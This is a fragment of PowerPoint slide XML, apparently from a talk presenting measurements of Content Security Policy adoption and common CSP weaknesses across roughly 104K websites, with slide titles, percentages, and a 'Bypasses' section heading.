              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B5929833-1E69-C7E5-12CB-15A04F15BEDB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="828675" y="189614"/>
            <a:ext cx="10534650" cy="817403"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="91440" tIns="45720" rIns="91440" bIns="45720" rtlCol="0" anchor="b">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="3600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF7900"/>
                </a:solidFill>
                <a:latin typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Percentage of Sites Using CSP per Country</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3600" kern="1200" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF79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08013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2" name="Picture 1" descr="A map of the world&#10;&#10;Description automatically generated">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B166632E-C5E2-F4DE-D21E-A6E4BEE84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5960"/>
            <a:ext cx="12181301" cy="5512040"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Title 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{39E6FF7D-319A-5ED3-B9FD-F65C5E910FC9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="828675" y="189614"/>
            <a:ext cx="10534650" cy="817403"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="91440" tIns="45720" rIns="91440" bIns="45720" rtlCol="0" anchor="b">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="3600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF7900"/>
                </a:solidFill>
                <a:latin typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Average Number of Weaknesses per Country</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3600" kern="1200" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF79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76771036"/>
      </p:ext>
    </p:extLst>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <mc:AlternateContent xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main">
    <mc:Choice Requires="p14">
      <p:transition p14:dur="0" advTm="20783"/>
    </mc:Choice>
    <mc:Fallback xmlns="">
      <p:transition advTm="2078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9291CDF-26A6-4225-4966-6400AB7BA2CF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="828675" y="189614"/>
            <a:ext cx="10534650" cy="817403"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="91440" tIns="45720" rIns="91440" bIns="45720" rtlCol="0" anchor="b">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="3600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF7900"/>
                </a:solidFill>
                <a:latin typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Most Frequent Weaknesses</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3600" kern="1200" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF7900"/>
              </a:solidFill>
              <a:latin typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Picture 6" descr="A heart with a pulse line&#10;&#10;Description automatically generated">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{15A5FAE5-A858-DE28-5CDE-BBFDB6C161CD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>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11265723" y="6004875"/>
            <a:ext cx="625190" cy="62519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C8B609BF-4692-EA3E-3A5F-F70D79DDB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1724"/>
            <a:ext cx="12192000" cy="5616276"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3583862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9291CDF-26A6-4225-4966-6400AB7BA2CF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="828675" y="189614"/>
            <a:ext cx="10534650" cy="817403"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="91440" tIns="45720" rIns="91440" bIns="45720" rtlCol="0" anchor="b">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="3600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF7900"/>
                </a:solidFill>
                <a:latin typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Most Frequent Weaknesses - Top</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3600" kern="1200" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF7900"/>
              </a:solidFill>
              <a:latin typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Helvetica"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C8B609BF-4692-EA3E-3A5F-F70D79DDBB5B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:extLst>
              <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
              </a:ext>
            </a:extLst>
          </a:blip>
          <a:srcRect l="1038" r="83726" b="44850"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4534619" y="1281007"/>
            <a:ext cx="3122762" cy="5207160"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="TextBox 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7E0FDF96-3A62-B455-AD74-B3B2AB2AB20B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8376866" y="2026818"/>
            <a:ext cx="2363638" cy="400110"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>~98% </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(103K/104K)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="TextBox 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{59B6E595-B236-42EA-83B6-998B8AD0A8D5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8376866" y="2579037"/>
            <a:ext cx="2363638" cy="400110"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>~95%</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(98K/104K)</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="2000" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1778117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How To See A Shooting Star | Shooting Stars Tonight | Meteor Shower  Photography | Star Walk">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FC06367E-E5DF-D558-AA58-CD1B64D157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BF16B5-CFB1-10A0-6336-A536BF45AFB0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="20241051">
            <a:off x="6721941" y="63006"/>
            <a:ext cx="1352550" cy="646331"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>report-to</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>base-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>uri</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0">
              <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1822029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How To See A Shooting Star | Shooting Stars Tonight | Meteor Shower  Photography | Star Walk">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FC06367E-E5DF-D558-AA58-CD1B64D157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BF16B5-CFB1-10A0-6336-A536BF45AFB0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="20241051">
            <a:off x="4943476" y="809625"/>
            <a:ext cx="1352550" cy="646331"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>report-to</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>base-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>uri</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0">
              <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1421035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9291CDF-26A6-4225-4966-6400AB7BA2CF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="828675" y="189614"/>
            <a:ext cx="10534650" cy="817403"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="91440" tIns="45720" rIns="91440" bIns="45720" rtlCol="0" anchor="b">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="3600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF7900"/>
                </a:solidFill>
                <a:latin typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Most Frequent Weaknesses - Last</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3600" kern="1200" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF7900"/>
              </a:solidFill>
              <a:latin typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Helvetica"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C8B609BF-4692-EA3E-3A5F-F70D79DDBB5B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:extLst>
              <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
              </a:ext>
            </a:extLst>
          </a:blip>
          <a:srcRect l="-1" t="60987" r="71274"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1879661" y="1840360"/>
            <a:ext cx="7156328" cy="4477110"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="TextBox 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2FFF5544-F5C5-E2F1-2866-206E8DE22341}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9500816" y="4157572"/>
            <a:ext cx="1862509" cy="400110"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>~9% </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(9K/104K)</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="2000" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="TextBox 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D5F936C6-C642-5E81-0167-D932D65277CE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9500815" y="4791782"/>
            <a:ext cx="1862509" cy="400110"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>~7% </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(7K/104K)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1362118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6C159B-3A13-3F5F-C491-4C2A1B65C182}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="443883" y="2209348"/>
            <a:ext cx="11514338" cy="24393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2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF7900"/>
                </a:solidFill>
                <a:latin typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Dashboard</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-GB" sz="12000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF7900"/>
                </a:solidFill>
                <a:latin typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-GB" sz="6600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF7900"/>
                </a:solidFill>
                <a:latin typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Data Tables and Weaknesses</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="12000" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF79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2293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D8F6E3-27FA-4FA0-BE96-02DE5789A19C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="397933" y="359833"/>
            <a:ext cx="5454327" cy="2912972"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="F5F5F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944E6F4A-D3EC-AE63-14C8-6EC72D0830BD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="426866" y="3429000"/>
            <a:ext cx="5425394" cy="3069167"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="E4E4E4"/>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GB" sz="1800" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF7900"/>
              </a:solidFill>
              <a:latin typeface="Helvetica" panose="020B060402020202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87F978AA-2BAA-BD2C-54EB-73739310E7A4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6096001" y="359833"/>
            <a:ext cx="5604932" cy="6138334"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="D3D3D3"/>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73A0E76-AD0F-DDF5-5CE9-E9C4F3F393DF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1799952" y="507232"/>
            <a:ext cx="2607733" cy="584775"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-GB" sz="3200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF7900"/>
                </a:solidFill>
                <a:latin typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Context</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="TextBox 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D7A789DD-3F97-6DE8-8D80-A56F6698BEE8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1279251" y="3579740"/>
            <a:ext cx="3649133" cy="584775"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-GB" sz="3200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF7900"/>
                </a:solidFill>
                <a:latin typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>The Big Data™ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="3200" dirty="0">
                <a:latin typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>✨</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="3200" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF7900"/>
              </a:solidFill>
              <a:latin typeface="Helvetica"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F07B7381-836D-81ED-0669-D96A959344DB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7594600" y="579920"/>
            <a:ext cx="2607733" cy="707886"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-GB" sz="4000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF7900"/>
                </a:solidFill>
                <a:latin typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Bypasses</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="13" name="Picture 12" descr="A cartoon of a pickaxe and pile of dirt&#10;&#10;Description automatically generated">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F27733E4-02BE-1CC0-5E49-A0B08C16F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301" y="4471450"/>
            <a:ext cx="1042659" cy="1042659"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:noFill/>
          </a:ln>
          <a:effectLst>
            <a:softEdge rad="0"/>
          </a:effectLst>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="15" name="Picture 14" descr="A yellow paper with a feather on it&#10;&#10;Description automatically generated">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3CD23545-8EB7-3063-0724-80BB7CCDD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505" y="1343891"/>
            <a:ext cx="967974" cy="967974"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
